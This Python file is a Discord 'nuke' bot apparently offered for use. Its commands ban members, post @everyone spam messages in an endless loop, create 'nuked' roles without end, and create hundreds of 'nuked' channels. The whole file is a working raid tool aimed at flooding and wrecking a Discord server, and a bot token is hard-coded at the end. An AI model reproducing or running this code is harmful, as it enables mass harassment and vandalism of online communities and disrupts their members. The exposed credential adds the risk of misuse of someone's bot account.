# Made By PacMan2009yo


import discord # Do not change these.
from discord.ext.commands import *
from discord.ext import commands
import random
import asyncio
import time
import json
from itertools import cycle
import time
from threading import Thread
from random import randint
import datetime
import os
import aiohttp
import sys
import traceback
import json
from discord.utils import get

 
##PREFIX##

bot = commands.Bot(command_prefix='!') # Enter the prefix for the bot here.

client = commands.Bot(command_prefix='!')

##OTHER##
bot.remove_command('help') # Removes the default help command for security.



##BOT IS READY##
@bot.event
async def on_ready():
#BOT STATUS#
    print("Bot Is Online! Getting Ready To Spam.") # Tells you when the bot is ready to use.
    print(f"Bot Status: Online!...")



##BAN COMMAND##
@bot.command(pass_context=True)
async def ban(ctx, member : discord.Member):
    await member.ban()
    await ctx.message.delete()

 
##SPAM COMMAND##
@bot.command(pass_context=True)
async def spam(ctx): # Run "!spam" to run the command
    await ctx.message.delete()
    while True:
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n") 
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")
        await ctx.send("You Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\nYou Have Been Spammed!@everyone\n")



        
##SPAM ROLE##
@bot.command(pass_context=True)
async def roles(ctx):
    await ctx.message.delete()
    while True:
        guild = ctx.guild
        await guild.create_role(name="nuked") # Here you can change the roles to desired name.



##MAKE CHANNELS##
@bot.command(pass_context=True)
async def channels(ctx):
    await ctx.message.delete()
    guild = ctx.message.guild
    await guild.create_text_channel('nuked') # You can change these to what ever you want.
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')
    await guild.create_text_channel('nuked')




##BOT TOKEN##
bot.run ("NDUyMTIzMzg5Mzk4ODc2MTYz.XsLOrQ.jv88kLOmCSvk-goX4cbbED3_kio") # Here you must put your bots token.
